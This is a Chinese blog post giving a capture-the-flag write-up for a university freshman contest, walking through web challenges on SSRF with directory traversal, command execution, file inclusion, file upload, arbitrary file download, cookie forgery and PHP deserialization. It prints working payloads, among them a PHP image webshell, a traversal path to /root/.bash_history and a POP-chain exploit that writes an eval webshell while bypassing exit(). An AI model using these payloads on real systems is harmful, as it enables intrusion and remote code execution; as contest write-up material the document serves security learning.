<!DOCTYPE html><html lang="zh-CN" theme-mode="dark"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>中航大新生赛wp | wOYOm的博客</title><link rel="icon" type="image/x-icon" href="/favicon.ico"><link rel="preload" as="font" crossorigin="anonymous" href="/font/Bender.ttf"><link rel="preload" as="font" crossorigin="anonymous" href="/font/BenderLight.woff2"><link rel="preload" as="font" crossorigin="anonymous" href="/font/JetBrainsMono-Regular.woff2"><link rel="stylesheet" href="/css/arknights.css"><style>@font-face {
  font-family: Bender;
  src: local('Bender'), url("/font/Bender.ttf"), url("/font/Bender.otf");
}
@font-face {
  font-family: BenderLight;
  src: local('BenderLight'), url("/font/BenderLight.ttf");
}
@font-face {
  font-family: 'JetBrains Mono';
  src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}
</style><meta name="page-config" content="{&quot;code_fold&quot;:null}"><script class="pjax-js">var config = {"root":"/","code_fold":15,"search":{"preload":false,"activeHolder":"Enter here","blurHolder":"Search","noResult":"Data \"$0\" not found"},"code":{"codeInfo":"$0 - $1 lines","copy":"copy"}};
var page_config = {
  code_fold: null
};
function updatePageConfig() {
  var newPageConfig = document.querySelector('meta[name="page-config"]');
  if (newPageConfig) {
    page_config = JSON.parse(newPageConfig.content);
  }
}
document.addEventListener('pjax:complete', function() { updatePageConfig(); });
updatePageConfig();</script><link type="text/css" rel="stylesheet" href="/lib/encrypt/hbe.style.css"><script src="//unpkg.com/mermaid@10.5.0/dist/mermaid.min.js"></script><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lightgallery.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-zoom.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-thumbnail.css"><link type="text/css" rel="stylesheet" href="/lib/fontawesome/css/all.min.css"><script>if (window.localStorage.getItem('theme-mode') === 'light')
 document.documentElement.setAttribute('theme-mode', 'light')
if (window.localStorage.getItem('theme-mode') === 'dark')
 document.documentElement.setAttribute('theme-mode', 'dark')</script><style>@font-face {
 font-family: BenderLight;
 src: local('Bender'), url("/font/BenderLight.woff2") format('woff2');
}
@font-face {
 font-family: 'JetBrains Mono';
 src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}</style><style>:root {
 --dark-background: url('https://image-assets.mihuashi.com/permanent/4636128|-2024/07/15/22/FoQgPgpt91kubhyYFgogmbaUv5ws.jpg');
 --light-background: url('https://image-assets.mihuashi.com/permanent/4636128|-2024/07/15/22/FoQgPgpt91kubhyYFgogmbaUv5ws.jpg');
 --theme-encrypt-confirm: 'confirm'
}</style><script defer src="/js/arknights.js"></script><script defer src="/js/search.js"></script><script defer src="https://vercount.one/js"></script><script defer type="module">import mermaid from '//unpkg.com/mermaid@10.5.0/dist/mermaid.esm.mjs';
window.mermaid = mermaid;
code.paintMermaid();
</script><script async src="//unpkg.com/lightgallery@2.7.1/lightgallery.min.js"></script><script async src="//unpkg.com/lightgallery@2.7.1/plugins/zoom/lg-zoom.min.js"></script><script async src="//unpkg.com/lightgallery@2.7.1/plugins/thumbnail/lg-thumbnail.min.js"></script><script async src="/lib/encrypt/hbe.js"></script><script async src="/js/pjax.js"></script><script class="pjax-js">reset= () => {document.querySelector('.lg-container')?.remove()
lightGallery(document.getElementById('post-bg'), {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js','data-pjax','.vercount','meta[name=page-config]'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);document.addEventListener('pjax:success', _ => {
 const script = document.createElement('script');
 script.src = 'https://vercount.one/js';
 document.head.appendChild(script);
});reset()})</script><script class="pjax-js">reset= () => {document.querySelector('.lg-container')?.remove()
const postBg = document.querySelector('#post-bg');
if (postBg) lightGallery(postBg, {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js','data-pjax','.vercount','meta[name=page-config]'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);document.addEventListener('pjax:success', _ => {
 const script = document.createElement('script');
 script.src = 'https://vercount.one/js';
 document.head.appendChild(script);
});reset()})</script><meta name="generator" content="Hexo 7.3.0"></head><body><div class="loading" style="opacity: 0;"><div class="loadingBar left"></div><div class="loadingBar right"></div></div><main><header class="closed"><div class="navBtn"><i class="navBtnIcon"><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span></i></div><nav><div class="navItem" id="search-header"><span class="navItemTitle"><input autocomplete="off" autocorrect="off" autocapitalize="none" placeholder="Search" spellcheck="false" maxlength="50" type="text" id="search-input"></span></div><div class="navItem" id="search-holder"></div><div class="search-popup" tabindex="0"><div id="search-result"></div></div><ol class="navContent"><li class="navItem"><a class="navBlock" href="/"><span class="navItemTitle">Home</span></a></li><li class="navItem" matchdata="categories,tags"><a class="navBlock" href="/archives/"><span class="navItemTitle">Archives</span></a></li></ol></nav></header><article><div id="post-bg"><div id="post-title"><h1>中航大新生赛wp</h1><div id="post-info"><span>First Post: <div class="control"><time datetime="2025-10-31T18:58:31.000Z" id="date"> 2025-11-01</time></div></span><br><span>Last Update: <div class="control"><time datetime="2025-11-01T14:24:48.335Z" id="updated"> 2025-11-01</time></div></span><br><span id="vercount_container_page_pv">Page View: <span class="control" id="vercount_value_page_pv">loading...</span></span></div></div><hr><div id="post-content"><h1 id="新生赛"><a href="#新生赛" class="headerlink" title="新生赛"></a>新生赛</h1><h2 id="WEB-SSRF-MAIN"><a href="#WEB-SSRF-MAIN" class="headerlink" title="WEB_SSRF_MAIN"></a>WEB_SSRF_MAIN</h2><p>一个披着SSRF外皮的目录穿越</p class='item-img' data-src='https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251027203114367.png'><img src="https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251027203114367.png" alt="image-20251027203114367" style="zoom:50%;" />

<p>进来看见皮卡丘还有图片获取，没找到端口有点怀疑放的图片所以我们去看看源码</p class='item-img' data-src='https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251027203101748.png'><img src="https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251027203101748.png" alt="image-20251027203101748" style="zoom:50%;" />

<p>很明显的SSRF</p class='item-img' data-src='https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251027203143635.png'><img src="https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251027203143635.png" alt="image-20251027203143635" style="zoom:50%;" />

<p>当你尝试直接访问的时候你就会被拦截回来你改ip也没有用</p>
<p>这时候就想到了我们可以访问api下的image文件中的任意图片那么也就意味着我们可以通过目录穿越看到前面目录的东西</p class='item-img' data-src='https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251027203216705.png'><img src="https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251027203216705.png" alt="image-20251027203216705" style="zoom:50%;" />

<img src="https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251027203314840.png" alt="image-20251027203314840" style="zoom:50%;" />

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">http://223.254.144.227:21282/api/fetch-image?url=http://127.0.0.1:8888/api/image/../lists<br></code></pre></td></tr></table></figure>

<p>成功访问</p class='item-img' data-src='https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251027203352391.png'><img src="https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251027203352391.png" alt="image-20251027203352391" style="zoom:50%;" />

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">http://223.254.144.227:21282/api/fetch-image?url=http://127.0.0.1:8888/api/image/../flaaaag<br></code></pre></td></tr></table></figure>

<h2 id="WEB-REV-RCE"><a href="#WEB-REV-RCE" class="headerlink" title="WEB-REV-RCE"></a>WEB-REV-RCE</h2><p>前面尝试了非常多的过滤手段，最后发现了它只能执行一条命令且不能有间隔符存在什么意思呢<br class='item-img' data-src='https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251027203437830.png'><img src="https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251027203437830.png" alt="image-20251027203437830" style="zoom:50%;" /></p class='item-img' data-src='https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251027203451698.png'><img src="https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251027203451698.png" alt="image-20251027203451698" style="zoom:50%;" />

<p>这时候我们去查环境变量</p class='item-img' data-src='https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251027203506188.png'><img src="https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251027203506188.png" alt="image-20251027203506188" style="zoom:50%;" />

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">http://223.254.144.227:21206/exec?cmd=env<br></code></pre></td></tr></table></figure>

<h2 id="web5-简单的文件包含"><a href="#web5-简单的文件包含" class="headerlink" title="web5-简单的文件包含"></a>web5-简单的文件包含</h2><p>这题fuzz工具出了点小问题于是想着自己先试试万一猜出来了呢，就试了最常用的file，</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">?file=123<br></code></pre></td></tr></table></figure>

<p>404，那就是找到了</p>
<p>直接读取flag.php</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">http://223.254.144.227:21349/?file=flag.php<br></code></pre></td></tr></table></figure>

<p>结束</p>
<h2 id="web6-文件上传的门槛"><a href="#web6-文件上传的门槛" class="headerlink" title="web6-文件上传的门槛"></a>web6-文件上传的门槛</h2><p>这个是根据提示做出来的因为它有include.php去执行，首先你要创建一个图片马</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">#define width 1<br>#define height 1  <br>&lt;?php system($_GET[&#x27;c&#x27;]); ?&gt;//创建为.txt<br></code></pre></td></tr></table></figure class='item-img' data-src='https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251101022749263.png'><img src="https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251101022749263.png" alt="image-20251101022749263" style="zoom:80%;" />

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">copy /b 1.jpg + shell.txt shell.jpg//指令<br></code></pre></td></tr></table></figure>

<p>生成图片马上传然后在include.php里面去用指定路径执行命令</p>
<p class='item-img' data-src='https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251101014630060.png'><img src="https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251101014630060.png" alt="image-20251101014630060" style="zoom:80%;" /><img src="https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251101022949604.png" alt="image-20251101022949604" style="zoom:80%;" /></p>
<h2 id="WEB7"><a href="#WEB7" class="headerlink" title="WEB7"></a>WEB7</h2><p>伪造本地ip就行</p class='item-img' data-src='https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251101023437828.png'><img src="https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251101023437828.png" alt="image-20251101023437828" style="zoom:80%;" />

<h2 id="web8-任意文件下载"><a href="#web8-任意文件下载" class="headerlink" title="web8-任意文件下载"></a>web8-任意文件下载</h2><p>根据提示存在history文件目录穿越加上常见文件夹猜测找到payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">../../../../root/.bash_history<br></code></pre></td></tr></table></figure>

<p>下载文件审计后发现写入flag的命令</p class='item-img' data-src='https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251027205844960.png'><img src="https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251027205844960.png" alt="image-20251027205844960" style="zoom:80%;" />

<h2 id="mycookie"><a href="#mycookie" class="headerlink" title="mycookie"></a>mycookie</h2><p>前端代码调用执行查看页面源码就能看见</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br></pre></td><td class="code"><pre><code class="hljs html"><span class="hljs-tag">&lt;<span class="hljs-name">script</span>&gt;</span><span class="language-javascript"></span><br><span class="language-javascript">     <span class="hljs-comment">// 使用原生Fetch API替代axios，避免外部依赖</span></span><br><span class="language-javascript">     <span class="hljs-variable language_">document</span>.<span class="hljs-title function_">getElementById</span>(<span class="hljs-string">&#x27;loginForm&#x27;</span>).<span class="hljs-title function_">addEventListener</span>(<span class="hljs-string">&#x27;submit&#x27;</span>, <span class="hljs-keyword">async</span> <span class="hljs-keyword">function</span>(<span class="hljs-params">e</span>) &#123;</span><br><span class="language-javascript">         e.<span class="hljs-title function_">preventDefault</span>();</span><br><span class="language-javascript">         </span><br><span class="language-javascript">         <span class="hljs-keyword">const</span> username = <span class="hljs-variable language_">document</span>.<span class="hljs-title function_">getElementById</span>(<span class="hljs-string">&#x27;username&#x27;</span>).<span class="hljs-property">value</span>.<span class="hljs-title function_">trim</span>();</span><br><span class="language-javascript">         <span class="hljs-keyword">const</span> password = <span class="hljs-variable language_">document</span>.<span class="hljs-title function_">getElementById</span>(<span class="hljs-string">&#x27;password&#x27;</span>).<span class="hljs-property">value</span>.<span class="hljs-title function_">trim</span>();</span><br><span class="language-javascript">         <span class="hljs-keyword">const</span> errorMsg = <span class="hljs-variable language_">document</span>.<span class="hljs-title function_">getElementById</span>(<span class="hljs-string">&#x27;errorMsg&#x27;</span>);</span><br><span class="language-javascript">         </span><br><span class="language-javascript">         errorMsg.<span class="hljs-property">style</span>.<span class="hljs-property">display</span> = <span class="hljs-string">&#x27;none&#x27;</span>;</span><br><span class="language-javascript">         </span><br><span class="language-javascript">         <span class="hljs-keyword">try</span> &#123;</span><br><span class="language-javascript">             <span class="hljs-comment">// 第一步：验证用户名和密码</span></span><br><span class="language-javascript">             <span class="hljs-keyword">const</span> formData = <span class="hljs-keyword">new</span> <span class="hljs-title class_">FormData</span>();</span><br><span class="language-javascript">             formData.<span class="hljs-title function_">append</span>(<span class="hljs-string">&#x27;username&#x27;</span>, username);</span><br><span class="language-javascript">             formData.<span class="hljs-title function_">append</span>(<span class="hljs-string">&#x27;password&#x27;</span>, password);</span><br><span class="language-javascript">             </span><br><span class="language-javascript">             <span class="hljs-keyword">const</span> verifyResponse = <span class="hljs-keyword">await</span> <span class="hljs-title function_">fetch</span>(<span class="hljs-string">&#x27;/api/login/verify&#x27;</span>, &#123;</span><br><span class="language-javascript">                 <span class="hljs-attr">method</span>: <span class="hljs-string">&#x27;POST&#x27;</span>,</span><br><span class="language-javascript">                 <span class="hljs-attr">body</span>: formData</span><br><span class="language-javascript">             &#125;);</span><br><span class="language-javascript">             </span><br><span class="language-javascript">             <span class="hljs-keyword">const</span> verifyResult = <span class="hljs-keyword">await</span> verifyResponse.<span class="hljs-title function_">json</span>();</span><br><span class="language-javascript">             </span><br><span class="language-javascript">             <span class="hljs-keyword">if</span> (verifyResult.<span class="hljs-property">code</span> !== <span class="hljs-number">200</span>) &#123;</span><br><span class="language-javascript">                 errorMsg.<span class="hljs-property">textContent</span> = verifyResult.<span class="hljs-property">msg</span>;</span><br><span class="language-javascript">                 errorMsg.<span class="hljs-property">style</span>.<span class="hljs-property">display</span> = <span class="hljs-string">&#x27;block&#x27;</span>;</span><br><span class="language-javascript">                 <span class="hljs-keyword">return</span>;</span><br><span class="language-javascript">             &#125;</span><br><span class="language-javascript">             </span><br><span class="language-javascript">             <span class="hljs-comment">// 第二步：获取Cookie（仅使用用户名）</span></span><br><span class="language-javascript">             <span class="hljs-keyword">const</span> cookieResponse = <span class="hljs-keyword">await</span> <span class="hljs-title function_">fetch</span>(<span class="hljs-string">&#x27;/api/login/get-cookie&#x27;</span>, &#123;</span><br><span class="language-javascript">                 <span class="hljs-attr">method</span>: <span class="hljs-string">&#x27;POST&#x27;</span>,</span><br><span class="language-javascript">                 <span class="hljs-attr">headers</span>: &#123;</span><br><span class="language-javascript">                     <span class="hljs-string">&#x27;Content-Type&#x27;</span>: <span class="hljs-string">&#x27;application/json&#x27;</span></span><br><span class="language-javascript">                 &#125;,</span><br><span class="language-javascript">                 <span class="hljs-attr">body</span>: <span class="hljs-title class_">JSON</span>.<span class="hljs-title function_">stringify</span>(&#123; <span class="hljs-attr">username</span>: verifyResult.<span class="hljs-property">username</span> &#125;)</span><br><span class="language-javascript">             &#125;);</span><br><span class="language-javascript">             </span><br><span class="language-javascript">             <span class="hljs-keyword">const</span> cookieResult = <span class="hljs-keyword">await</span> cookieResponse.<span class="hljs-title function_">json</span>();</span><br><span class="language-javascript">             </span><br><span class="language-javascript">             <span class="hljs-keyword">if</span> (cookieResult.<span class="hljs-property">code</span> !== <span class="hljs-number">200</span>) &#123;</span><br><span class="language-javascript">                 errorMsg.<span class="hljs-property">textContent</span> = cookieResult.<span class="hljs-property">msg</span>;</span><br><span class="language-javascript">                 errorMsg.<span class="hljs-property">style</span>.<span class="hljs-property">display</span> = <span class="hljs-string">&#x27;block&#x27;</span>;</span><br><span class="language-javascript">                 <span class="hljs-keyword">return</span>;</span><br><span class="language-javascript">             &#125;</span><br><span class="language-javascript">             </span><br><span class="language-javascript">             <span class="hljs-comment">// 设置Cookie并跳转首页</span></span><br><span class="language-javascript">             <span class="hljs-variable language_">document</span>.<span class="hljs-property">cookie</span> = <span class="hljs-string">`auth_token=<span class="hljs-subst">$&#123;cookieResult.auth_token&#125;</span>; path=/; max-age=3600`</span>;</span><br><span class="language-javascript">             <span class="hljs-variable language_">window</span>.<span class="hljs-property">location</span>.<span class="hljs-property">href</span> = <span class="hljs-string">&#x27;/&#x27;</span>;</span><br><span class="language-javascript">             </span><br><span class="language-javascript">         &#125; <span class="hljs-keyword">catch</span> (error) &#123;</span><br><span class="language-javascript">             errorMsg.<span class="hljs-property">textContent</span> = <span class="hljs-string">&#x27;Login failed. Please try again.&#x27;</span>;</span><br><span class="language-javascript">             errorMsg.<span class="hljs-property">style</span>.<span class="hljs-property">display</span> = <span class="hljs-string">&#x27;block&#x27;</span>;</span><br><span class="language-javascript">             <span class="hljs-variable language_">console</span>.<span class="hljs-title function_">error</span>(<span class="hljs-string">&#x27;Login error:&#x27;</span>, error);</span><br><span class="language-javascript">         &#125;</span><br><span class="language-javascript">     &#125;);</span><br><span class="language-javascript"> </span><span class="hljs-tag">&lt;/<span class="hljs-name">script</span>&gt;</span><br></code></pre></td></tr></table></figure>

<p>16042</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">fetch(&#x27;/api/login/get-cookie&#x27;, &#123;<br>    method: &#x27;POST&#x27;,<br>    headers: &#123;<br>        &#x27;Content-Type&#x27;: &#x27;application/json&#x27;,<br>    &#125;,<br>    body: JSON.stringify(&#123;username: &quot;admin&quot;&#125;)<br>&#125;)<br>.then(response =&gt; response.json())<br>.then(data =&gt; &#123;<br>    console.log(&quot;API Response:&quot;, data);<br>    <br>        document.cookie = `auth_token=$&#123;data.auth_token&#125;; path=/; max-age=3600`;<br>            <br>&#125;);<br></code></pre></td></tr></table></figure class='item-img' data-src='https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251027204517439.png'><img src="https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251027204517439.png" alt="image-20251027204517439" style="zoom:80%;" />

<p>生成完直接去访问就行</p>
<h2 id="Spring"><a href="#Spring" class="headerlink" title="Spring"></a>Spring</h2><p>藏在配置文件里</p class='item-img' data-src='https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251027204903465.png'><img src="https://woyom-1374329874.cos.ap-nanjing.myqcloud.com/image-20251027204903465.png" alt="image-20251027204903465" style="zoom:80%;" />

<h2 id="UNSER"><a href="#UNSER" class="headerlink" title="UNSER"></a>UNSER</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">gogogo</span></span><br><span class="hljs-class"></span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$www</span> = <span class="hljs-string">&quot;Lets start! &quot;</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__destruct</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-keyword">echo</span> <span class="hljs-variable language_">$this</span>-&gt;www;<br>    &#125;<br>&#125;<br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">start</span></span><br><span class="hljs-class"></span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$coffe</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__tostring</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-keyword">return</span> <span class="hljs-variable language_">$this</span>-&gt;coffe-&gt;dense;<br>    &#125;<br>&#125;<br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">soda</span></span><br><span class="hljs-class"></span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$gunmu</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__get</span>(<span class="hljs-params"><span class="hljs-variable">$content</span></span>)</span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-variable">$g</span> = <span class="hljs-variable language_">$this</span>-&gt;gunmu;<br>        <span class="hljs-keyword">return</span> <span class="hljs-variable">$g</span>();<br>    &#125;<br>&#125;<br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">end</span></span><br><span class="hljs-class"></span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$content</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$filename</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__invoke</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-title function_ invoke__">file_put_contents</span>(<span class="hljs-variable">$this</span>-&gt;filename, <span class="hljs-string">&quot;&lt;?php exit();&quot;</span> . <span class="hljs-variable">$this</span>-&gt;content);<br>    &#125;<br>&#125;<br><br><span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;p&#x27;</span>])) &#123;<br>    <span class="hljs-variable">$ser</span> = <span class="hljs-title function_ invoke__">unserialize</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;p&#x27;</span>]);<br>&#125; <span class="hljs-keyword">else</span> &#123;<br>    <span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br>&#125;<br></code></pre></td></tr></table></figure>



<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs PHP"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">gogogo</span> </span>&#123; <span class="hljs-keyword">public</span> <span class="hljs-variable">$www</span>; &#125;<br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">start</span> </span>&#123; <span class="hljs-keyword">public</span> <span class="hljs-variable">$coffe</span>; &#125;<br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">soda</span> </span>&#123; <span class="hljs-keyword">public</span> <span class="hljs-variable">$gunmu</span>; &#125;<br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">end</span> </span>&#123; <span class="hljs-keyword">public</span> <span class="hljs-variable">$content</span>; <span class="hljs-keyword">public</span> <span class="hljs-variable">$filename</span>; &#125;<br><br><span class="hljs-variable">$end</span> = <span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">end</span>();<br><span class="hljs-variable">$end</span>-&gt;filename = <span class="hljs-string">&#x27;php://filter/convert.base64-decode/resource=1.php&#x27;</span>;  <br><span class="hljs-variable">$end</span>-&gt;content = <span class="hljs-string">&#x27;aPD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=&#x27;</span>;<br><br><span class="hljs-variable">$soda</span> = <span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">soda</span>();<br><span class="hljs-variable">$soda</span>-&gt;gunmu = <span class="hljs-variable">$end</span>;<br><br><span class="hljs-variable">$start</span> = <span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">start</span>();<br><span class="hljs-variable">$start</span>-&gt;coffe = <span class="hljs-variable">$soda</span>;<br><br><span class="hljs-variable">$gogogo</span> = <span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">gogogo</span>();<br><span class="hljs-variable">$gogogo</span>-&gt;www = <span class="hljs-variable">$start</span>;<br><br><span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">serialize</span>(<span class="hljs-variable">$gogogo</span>) . <span class="hljs-string">&quot;\n\n&quot;</span>;<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>POP链</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">gogogo::__destruct -&gt; start::__toString -&gt; soda::__get -&gt; end::__invoke<br></code></pre></td></tr></table></figure>

<p>exit()的死亡绕过上网搜一搜base64编码绕过在我们的木马前面+a让前面的exit变成乱码将文件名写出php协议base64解码的形式</p>
